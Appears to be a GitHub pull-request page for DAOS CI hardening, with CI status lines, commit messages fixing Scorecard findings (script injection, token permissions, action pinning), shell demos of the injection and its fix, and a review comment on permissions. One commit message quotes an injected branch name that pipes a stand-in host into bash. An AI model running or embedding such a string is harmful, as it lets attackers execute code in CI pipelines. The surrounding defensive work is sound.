DAOS-18626 cq: ASAN Men check with GitHub Action #18557
Ticket title is 'ASAN Men check with GitHub Action'
Force-pushed from 49ca01a to 513c51b.
Force-pushed from 513c51b to 9ca93b1.
Test stage Functional on EL 9 completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/3/execution/node/1059/log
You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool. What Enabling Code Scanning Means: For more information about GitHub Code Scanning, check out the documentation.
Test stage Functional Hardware Large MD on SSD completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/12/execution/node/1330/log
Force-pushed from 9bb48e6 to 1929d2b.
Fixes three issues flagged by GitHub Scorecard on PR #18557:

1. [CRITICAL score=0] Dangerous-Workflow: script injection in memcheck.yml
   The 'Resolve SARIF ref and SHA' step interpolated GitHub context values (${{ github.event.pull_request.head.ref }}, etc.) directly into a bash run: block. A PR branch name containing shell metacharacters (e.g. 'main"; curl evil.com|bash; echo') would execute arbitrary code.
   Fix: pass all context values through an env: block and reference them as ${ENV_VAR} in the shell, following GitHub's recommended remediation.

2+3. [WARNING score=7] Token-Permissions: top-level permissions in tsan.yml
   security-events: write and checks: write were set at the workflow top level. Best practice is to set permissions at the job level so that only the specific job that needs them receives elevated access.
   Fix: remove the top-level permissions block from tsan.yml and add a permissions: section directly under the build-daos_tsan job.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
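The injection described in this commit message, as an added shell simulation that is not code from the PR or the DAOS repository. It reproduces what GitHub Actions does when a `${{ ... }}` expression sits inside a `run:` block (textual substitution before the shell parses the script) and contrasts it with the `env:` remediation. The step name is taken from the commit message; the echo text, the `HEAD_REF` variable name and the branch-name payload are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not DAOS project code: simulates the script-injection pattern
# the commit message describes. GitHub Actions substitutes the text of a
# ${{ ... }} expression into a run: script BEFORE the shell parses it, so a
# branch name with shell metacharacters becomes code. Routing the value through
# an env: block makes it plain data. The step name comes from the commit message;
# the echo text, the HEAD_REF variable name and the branch-name payload are
# assumptions made for this example.
#
# Vulnerable shape (illustrative YAML, not the project's real memcheck.yml):
#   - name: Resolve SARIF ref and SHA
#     run: echo "Resolving SARIF ref: ${{ github.event.pull_request.head.ref }}"
# Hardened shape:
#   - name: Resolve SARIF ref and SHA
#     env:
#       HEAD_REF: ${{ github.event.pull_request.head.ref }}
#     run: echo "Resolving SARIF ref: ${HEAD_REF}"

# Constructed attacker-controlled branch name (same shape as the commit's example).
MALICIOUS_REF='main"; echo INJECTED; echo "'
PLACEHOLDER='${{ github.event.pull_request.head.ref }}'

# Replace one literal occurrence of $2 in $1 with $3. Quoting "$2" inside the
# ${...%%...} / ${...#...} patterns makes the match literal rather than a glob.
render_template() {
  prefix=${1%%"$2"*}
  suffix=${1#*"$2"}
  printf '%s\n' "$prefix$3$suffix"
}

# Vulnerable step: the raw value is spliced into the script text, and only then
# is the script handed to a shell, which parses the quotes and ';' as syntax.
# (GitHub runs Linux steps under bash; the parsing involved is the same in any POSIX sh.)
run_vulnerable_step() {
  script=$(render_template \
    'echo "Resolving SARIF ref: '"$PLACEHOLDER"'"' "$PLACEHOLDER" "$1")
  sh -c "$script"
}

# Hardened step: the script text is a constant and the value arrives through the
# environment; "${HEAD_REF}" is expanded by the shell as a string, never re-parsed.
run_hardened_step() {
  HEAD_REF=$1 sh -c 'echo "Resolving SARIF ref: ${HEAD_REF}"'
}

# True when the output contains a line that is exactly INJECTED, i.e. the payload
# executed as a command rather than being printed as part of the branch name.
injected() {
  printf '%s\n' "$1" | grep -qx 'INJECTED'
}

echo '--- vulnerable step, attacker-controlled branch name ---'
run_vulnerable_step "$MALICIOUS_REF"
echo '--- hardened step, same branch name ---'
run_hardened_step "$MALICIOUS_REF"
```

The same rule covers every attacker-influenced context value (PR title, body, commit message, author name, issue title), not only `head.ref`: anything that reaches a `run:` block must come in through `env:` or an action input, and be quoted when expanded.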
Fixes three open Scorecard findings from PR #18557:

1. Pinned-Dependencies (score=3): codeql-action/upload-sarif@v4 is a floating tag. Scorecard requires actions to be pinned by full commit SHA to prevent supply-chain attacks.
   Fix: replace @v4 with @8aad20d150bbac5944a9f9d289da16a4b0d87c1e (v4.36.2) in both memcheck.yml (2 occurrences) and tsan.yml (1). This SHA is already used by other workflows in the repository.

2. Token-Permissions (score=8): no top-level permission defined in tsan.yml after we moved permissions to job-level. Scorecard requires an explicit top-level permissions block so any future job added to the workflow gets the minimum access (read-only) by default.
   Fix: add 'permissions: {}' at workflow top-level in tsan.yml.

Note: Token-Permissions score=8 for 'jobLevel checks: write' in tsan.yml (finding 3490170495) is expected and accepted. This permission is required by the action-junit-report action to post test result checks, and the same pattern is used without issue in memcheck.yml.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
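One way to check for the two findings this commit describes (actions not pinned by commit SHA, and no top-level permissions block), as an added shell example that is not code from the PR or the DAOS repository. The workflow text is constructed for the example; only the build-daos_tsan job name and the upload-sarif SHA (v4.36.2) come from the commit message, everything else in it is an assumption and not the project's real tsan.yml.

```shell
#!/bin/sh
# Added example, not DAOS project code: a small checker for the two Scorecard
# findings in this commit message. It lists every `uses:` reference that is not
# pinned to a full 40-hex commit SHA and reports whether the workflow declares a
# top-level permissions: block. The workflow text below is constructed for the
# example; the job name and the upload-sarif SHA are taken from the commit message,
# everything else in it is an assumption, not the project's real tsan.yml.

# Before: a floating tag, a quoted floating tag, and no top-level permissions.
SAMPLE_WORKFLOW='name: tsan
on: [pull_request]
jobs:
  build-daos_tsan:
    runs-on: ubuntu-latest
    permissions:
      security-events: write
      checks: write
    steps:
      - uses: actions/checkout@v4
      - uses: "github/codeql-action/upload-sarif@v4"
      - uses: ./.github/actions/run-unit-tests
'

# After: every remote action pinned by SHA and an empty top-level default.
FIXED_WORKFLOW='name: tsan
on: [pull_request]
permissions: {}
jobs:
  build-daos_tsan:
    runs-on: ubuntu-latest
    permissions:
      security-events: write
      checks: write
    steps:
      - uses: ./.github/actions/run-unit-tests
      - uses: github/codeql-action/upload-sarif@8aad20d150bbac5944a9f9d289da16a4b0d87c1e # v4.36.2
'

# Print the value of every `uses:` key: drop the key and optional list dash,
# any trailing "# vX.Y.Z" comment, and surrounding quotes.
action_refs() {
  printf '%s\n' "$1" \
    | sed -n 's/^[[:space:]]*-\{0,1\}[[:space:]]*uses:[[:space:]]*//p' \
    | sed 's/[[:space:]]*#.*$//' \
    | tr -d "\"'"
}

# Print each ref that is not pinned to a 40-hex commit SHA. Local actions
# (./path) have no ref to pin and are skipped; a ref with no '@' is unpinned.
unpinned_actions() {
  action_refs "$1" | while IFS= read -r ref; do
    case $ref in
      ./*) continue ;;
    esac
    sha=${ref#*@}
    if ! printf '%s\n' "$sha" | grep -Eqx '[0-9a-f]{40}'; then
      printf '%s\n' "$ref"
    fi
  done
}

# True when permissions: is declared at column 0, i.e. at workflow level, which
# is what makes `permissions: {}` the default token scope for every job.
has_toplevel_permissions() {
  printf '%s\n' "$1" | grep -q '^permissions:'
}

# Both conditions from the commit message: nothing unpinned, explicit top-level default.
scorecard_ok() {
  [ -z "$(unpinned_actions "$1")" ] && has_toplevel_permissions "$1"
}

echo 'Unpinned actions in the before workflow:'
unpinned_actions "$SAMPLE_WORKFLOW"
if scorecard_ok "$FIXED_WORKFLOW"; then echo 'After workflow: pinned and scoped'; fi
```

This is a line-oriented approximation of the Scorecard checks, not a YAML parser: it does not handle `docker://` image references, multi-document files or `uses:` values split across lines, and a SHA pin is only as good as the `# vX.Y.Z` comment and the tooling (Dependabot or Renovate) that keeps it current.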
Force-pushed from 6e5ef4b to 98995d5.
Force-pushed from 7dfbd60 to f798de2.
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/46/execution/node/434/log

Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/47/execution/node/436/log
Force-pushed from 0fe6c20 to 678e4a0.
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/48/execution/node/434/log
Force-pushed from 678e4a0 to 08e21c2.
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/49/execution/node/433/log
Force-pushed from 08e21c2 to 3012815.
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/50/execution/node/434/log

Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/50/testReport/

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/50/testReport/
Force-pushed from 3012815 to 29af6c0.
| @@ -0,0 +1,268 @@ | |||
| # SPDX-License-Identifier: BSD-2-Clause-Patent | |||
| artifact_name: 'test-results-unit' | ||
| check_name: 'Unit Testing' | ||
| permissions: | ||
| checks: write |
| artifact_name: 'test-results-asan' | ||
| check_name: 'Unit Test Results (ASan build)' | ||
| permissions: | ||
| security-events: write |
| check_name: 'Unit Test Results (ASan build)' | ||
| permissions: | ||
| security-events: write | ||
| checks: write |
| artifact_name: 'test-results-tsan' | ||
| check_name: 'Unit Test Results (TSan build)' | ||
| permissions: | ||
| security-events: write |
| check_name: 'Unit Test Results (TSan build)' | ||
| permissions: | ||
| security-events: write | ||
| checks: write |
| artifact_name: 'test-results-ubsan' | ||
| check_name: 'Unit Test Results (UBSan build)' | ||
| permissions: | ||
| security-events: write |
| check_name: 'Unit Test Results (UBSan build)' | ||
| permissions: | ||
| security-events: write | ||
| checks: write |
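Review bot: the job-level permissions blocks in this hunk are inconsistent with each other, and nothing visible establishes a top-level default. The ASan, TSan and UBSan entries each appear once with only `security-events: write` and once with both `security-events: write` and `checks: write`, while the 'Unit Testing' entry carries only `checks: write`. Since `checks: write` is needed only by the step that posts the JUnit result check and `security-events: write` only by the SARIF upload, confirm that each block grants exactly what its own job's steps use and drop the extra scope where a job does neither. The header `@@ -0,0 +1,268 @@` shows this is a new 268-line file but its first lines are not shown here; make sure it opens with `permissions: {}` so that any job added later starts with no token access rather than the repository default.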
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/51/execution/node/434/log

Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/51/testReport/

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/51/testReport/

Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/52/execution/node/435/log

Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/52/testReport/

Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/53/execution/node/436/log
Force-pushed from 5582f20 to 1cd88d5.
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/54/execution/node/435/log

Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/55/execution/node/435/log

Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/55/testReport/

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/55/testReport/
…caffold TODO Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Force-pushed from 1cd88d5 to 3036055.
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/56/execution/node/434/log
TODO
Steps for the author:
After all prior steps are complete: